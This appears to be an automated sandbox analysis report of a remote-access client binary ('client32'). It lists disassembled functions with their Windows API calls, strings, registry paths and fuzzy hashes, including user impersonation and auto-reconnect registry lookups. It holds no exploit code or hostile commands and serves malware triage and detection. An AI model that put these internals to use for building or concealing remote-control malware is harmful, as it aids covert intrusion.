Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 110AF33E
m_hWnd, xrefs: 110AF343

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$CountDeleteErrorExitItemLastMessageProcesswsprintf
String ID: e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 2484136202-1557312927
Opcode ID: bcacf5f189fccd2e56c6c5f12fc971f734e75ed69440acf96920cd341ab3bb06
Instruction ID: 740f4026c9f67b21facb63a7154dcb50d19f95f0e9da13a6ec497569553e537b
Opcode Fuzzy Hash: bcacf5f189fccd2e56c6c5f12fc971f734e75ed69440acf96920cd341ab3bb06
Instruction Fuzzy Hash: 4FF0EC73D41720BFD3129AB0AC88F8DF398BB49759F048929F601E71C4D7645841C7A5

Function 110033E0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EF1), ref: 110033ED
GetSubMenu.USER32(00000000,00000000), ref: 11003413
DestroyMenu.USER32(00000000), ref: 11003442

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

hMenu, xrefs: 11003403
..\CTL32\annotate.cpp, xrefs: 110033FE, 11003424
hSub, xrefs: 11003429

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: df64ea0d2fae3ecbce4d898b4dfec4b1ea76ad89041e8687394a6c81806b7d14
Instruction ID: 1cad6fc9c95bf05f50b6ce3caf6643c8411129ac664c74d8947400ee595e6a5d
Opcode Fuzzy Hash: df64ea0d2fae3ecbce4d898b4dfec4b1ea76ad89041e8687394a6c81806b7d14
Instruction Fuzzy Hash: A9F0A73EE5456237D9136265AC09F8FB6D4CB965ADF058031F800BA685EA20B40145F5

Function 110032F0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(00000000,00002EFD), ref: 110032FD
GetSubMenu.USER32(00000000,00000000), ref: 11003323
DestroyMenu.USER32(00000000), ref: 11003352

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

hMenu, xrefs: 11003313
..\CTL32\annotate.cpp, xrefs: 1100330E, 11003334
hSub, xrefs: 11003339

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
String ID: ..\CTL32\annotate.cpp$hMenu$hSub
API String ID: 468487828-934300333
Opcode ID: cb8f0810ee07e3752238a0c809691a2f2e075db7e03e247ef5e11464e5e03cf9
Instruction ID: d45ddfe76467ef9f778f5ab9a3906980c2d231470f314a4c50cab6afe01776b3
Opcode Fuzzy Hash: cb8f0810ee07e3752238a0c809691a2f2e075db7e03e247ef5e11464e5e03cf9
Instruction Fuzzy Hash: 25F0A03EE5466227D9136665AC4AF8FBBD5CB966AAF048031F800E6384EA20A40145B5

Function 1107B000 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1107B027

Part of subcall function 111515D1: __FF_MSGBANNER.LIBCMT ref: 111515EA
Part of subcall function 111515D1: __NMSG_WRITE.LIBCMT ref: 111515F1
Part of subcall function 111515D1: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,111028FE,?,?,?,?,111343F2,?,?,?), ref: 11151616

Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069

Strings

r>b/, xrefs: 1107B006
e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h, xrefs: 1107B043
..\CTL32\DataStream.cpp, xrefs: 1107B05D
IsEmpty(), xrefs: 1107B062
IsA(), xrefs: 1107B048

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateErrorExitHeapLastMessageProcess_mallocwsprintf
String ID: ..\CTL32\DataStream.cpp$IsA()$IsEmpty()$e:\nsmsrc\nsm\1201\1201f2\ctl32\DataStream.h$r>b/
API String ID: 1213237569-1799837550
Opcode ID: 43ed9c6420532e4524c3720cbf1ef286ec7f3143fec27f23e581ff043888cdb7
Instruction ID: 8f9985f317ad91541f6e001387be189c660fec69166a5be52da1ea2e7750abee
Opcode Fuzzy Hash: 43ed9c6420532e4524c3720cbf1ef286ec7f3143fec27f23e581ff043888cdb7
Instruction Fuzzy Hash: F6F090B5A00B155FE3709F55DC04B86F7E8AF14708F008529E5AA97A40E7B1B514CFD1

Function 1105D390 Relevance: 9.1, APIs: 6, Instructions: 97timeCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1105D3A6

Part of subcall function 111521E3: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,11104EFA,?,00000000,00000001,00020001,?,?,currentver,?), ref: 111521EE
Part of subcall function 111521E3: __aulldiv.LIBCMT ref: 1115220E

__localtime64.LIBCMT ref: 1105D3AF

Part of subcall function 11154DED: __localtime64_s.LIBCMT ref: 11154E02

SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 1105D438
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 1105D442
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1105D463
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1105D471

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv__localtime64__localtime64_s__time64
String ID:
API String ID: 667980571-0
Opcode ID: baf43ef1593a7cdecb94672a433a1750632353f139cf7ae1fa9ef072f7b28b7a
Instruction ID: c1e4814d99555f495de290984051ba4bd9ed83c2fedc9342f642c632bc13bcf0
Opcode Fuzzy Hash: baf43ef1593a7cdecb94672a433a1750632353f139cf7ae1fa9ef072f7b28b7a
Instruction Fuzzy Hash: 3E317C76D1021CABCF44DFE8DC41AEEF7B8EF48314F04812AE815B7240EA746A04CBA5

Function 11085800 Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

ImpersonateLoggedOnUser.ADVAPI32(?,?,00000001,00000000,?,110858D7,00000210,00000001,?,00000000,00000000,?,?,11055B33,75922F10,?), ref: 1108581B
GetLastError.KERNEL32(00000000,00000000,?,?,11055B33,75922F10,?,1105649A), ref: 11085850
RevertToSelf.ADVAPI32(00000000,00000000,?,?,11055B33,75922F10,?,1105649A), ref: 11085858
SetLastError.KERNEL32(00000000), ref: 1108585F
GetLastError.KERNEL32(?,110858D7,00000210,00000001,?,00000000,00000000,?,?,11055B33,75922F10,?,1105649A), ref: 11085869
CloseHandle.KERNEL32(00000000,?,110858D7,00000210,00000001,?,00000000,00000000,?,?,11055B33,75922F10,?,1105649A), ref: 11085876

Part of subcall function 11084EB0: FindWindowA.USER32(?,00000000), ref: 11084EE4

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$CloseFindHandleImpersonateLoggedRevertSelfUserWindow
String ID:
API String ID: 3990649097-0
Opcode ID: 2ae80f2551f4040df14b49d6854304345b8eb4c91f93e1a3928cc36eda60f480
Instruction ID: 47c83686e4762880e528215e30e0df371d53a57d8877459fa4e5604c20e7679d
Opcode Fuzzy Hash: 2ae80f2551f4040df14b49d6854304345b8eb4c91f93e1a3928cc36eda60f480
Instruction Fuzzy Hash: F0016D37B14226AF9712DEA9D88499F77ECEB896647058125FE19E3204DA31DC028BF0

Function 1115F0C2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 1115F0CE

Part of subcall function 1115A195: __getptd_noexit.LIBCMT ref: 1115A198
Part of subcall function 1115A195: __amsg_exit.LIBCMT ref: 1115A1A5

__amsg_exit.LIBCMT ref: 1115F0EE
__lock.LIBCMT ref: 1115F0FE
InterlockedDecrement.KERNEL32(?), ref: 1115F11B
_free.LIBCMT ref: 1115F12E
InterlockedIncrement.KERNEL32(026115B8), ref: 1115F146

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: e40253f875d940b7a8dc3236e0f89e6710caf89b4cb49835c4960a95df8dfdc6
Instruction ID: 803fd973862948a3a3ecb7a001aea24e080d02acdb4679c2f1c74669b507a754
Opcode Fuzzy Hash: e40253f875d940b7a8dc3236e0f89e6710caf89b4cb49835c4960a95df8dfdc6
Instruction Fuzzy Hash: 3D018436901B339BDBD29F65C48974DF760AB0772CF188555E830A7284CB746942CFD2

Function 1105F340 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 1105F4A3

Strings

CalledControl connectCB (ConnectToClient), xrefs: 1105F3C3
Processed EV_CALLED_CONTROL s=%d, addr=%s, xrefs: 1105F483
Processing EV_CALLED_CONTROL s=%d, addr=%s, xtra=%s..., xrefs: 1105F39A
CalledControl queuing connectCB, xrefs: 1105F3FE

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _free
String ID: CalledControl connectCB (ConnectToClient)$CalledControl queuing connectCB$Processed EV_CALLED_CONTROL s=%d, addr=%s$Processing EV_CALLED_CONTROL s=%d, addr=%s, xtra=%s...
API String ID: 269201875-3945191877
Opcode ID: a281abe468fc8cf5dea406ee3c8c3c03f4288b3989de67ec6b479d0f55733ec8
Instruction ID: eba7aeba7a80585ba5bfcf02ccd4cc4943b90b94df59a5d5031289039a8223e0
Opcode Fuzzy Hash: a281abe468fc8cf5dea406ee3c8c3c03f4288b3989de67ec6b479d0f55733ec8
Instruction Fuzzy Hash: C64163B9A04A41AFD794CFA4DD44F56F7E4FF44718F10865EE85983280EB74B844CBA2

Function 110553D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(-80000002,SOFTWARE\Productive Computer Insight\Client32\AutoReconnect,00000000,00020019,00000000,?,?), ref: 11055450
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,00000000,?,?,?,?,?,?), ref: 110554AF
RegEnumValueA.ADVAPI32(00000000,00000001,?,?,00000000,?,?,?,?,?), ref: 11055521
RegCloseKey.ADVAPI32(00000000,?,?,?), ref: 1105552E

Strings

SOFTWARE\Productive Computer Insight\Client32\AutoReconnect, xrefs: 11055409, 11055444

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnumValue$CloseOpen
String ID: SOFTWARE\Productive Computer Insight\Client32\AutoReconnect
API String ID: 3785232357-4133889954
Opcode ID: 522fb6f12ae8a7514099b8464e6d3ecc568f065a2cd26f1cbba31b508d85541a
Instruction ID: 4fc8b8c254a8e03eea46efce211ec302a356c8092de060a52f9bb50f925273d8
Opcode Fuzzy Hash: 522fb6f12ae8a7514099b8464e6d3ecc568f065a2cd26f1cbba31b508d85541a
Instruction Fuzzy Hash: F0416672E112299FEB54CF54CC91FDAB7B8AB49704F4042D9E60DE7180EA716E44CFA1

Function 110D3610 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

std::exception::exception.LIBCMT ref: 110D3704
__CxxThrowException@8.LIBCMT ref: 110D3719

Part of subcall function 110091F0: std::_Xinvalid_argument.LIBCPMT ref: 11009265
Part of subcall function 110091F0: _memmove.LIBCMT ref: 110092B6

Strings

Your system/device requires approval by the service before you can access it fully, xrefs: 110D36D7
Invalid Passcode, xrefs: 110D3695
The version of the software you are running is not supported by the service, xrefs: 110D36B6

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8ThrowXinvalid_argument_malloc_memmove_memsetstd::_std::exception::exceptionwsprintf
String ID: Invalid Passcode$The version of the software you are running is not supported by the service$Your system/device requires approval by the service before you can access it fully
API String ID: 390219819-299493402
Opcode ID: 9686af79d25668be6855d6c8f85a6bbd900222d5403466898b2c9f683637aed3
Instruction ID: 290987c637faf9a82613e3c1efdfb8245697807f6b36602a3304b8d6bb74055a
Opcode Fuzzy Hash: 9686af79d25668be6855d6c8f85a6bbd900222d5403466898b2c9f683637aed3
Instruction Fuzzy Hash: FC4162B5A0420AABD700CF99C850BDAF7F8FF08314F00865AE91997781DB74AA04CBA0

Function 11049150 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 72timeCOMMON

Download Yara Rule

APIs

KillTimer.USER32(00000000,00000001), ref: 1104919C

Part of subcall function 11035830: wsprintfA.USER32 ref: 1103589E
Part of subcall function 11035830: SetDlgItemTextA.USER32(?,?,?), ref: 1103596F

Strings

m_hWnd, xrefs: 11049189
e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h, xrefs: 11049184
Client, xrefs: 110491B1
AckDlgTimeoutAccept, xrefs: 110491AC

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemKillTextTimerwsprintf
String ID: AckDlgTimeoutAccept$Client$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
API String ID: 1646146092-2249245707
Opcode ID: 74a23c6806cd996f4e5802ec0325577df80bd7c351eda1b89e39841f079f60ff
Instruction ID: c02fd1ebd72f3abd6975baaa61c1d6d589ae8a261551f4e8277244e37f20d25c
Opcode Fuzzy Hash: 74a23c6806cd996f4e5802ec0325577df80bd7c351eda1b89e39841f079f60ff
Instruction Fuzzy Hash: 8511B479B0070A6BE710DE65DC84F9AB3D9AB88354F108439FA5597690EB71F801CBA1

Function 6CC7ECC0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CCAC540,?,00000000,D7B0ED52), ref: 6CC7ECFD
LeaveCriticalSection.KERNEL32(6CCAC540,?,00000000,D7B0ED52), ref: 6CC7ED49
DeleteCriticalSection.KERNEL32(?,D7B0ED52), ref: 6CC7ED50

Strings

p < ep, xrefs: 6CC7ED31
Refcount.cpp, xrefs: 6CC7ED2C

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

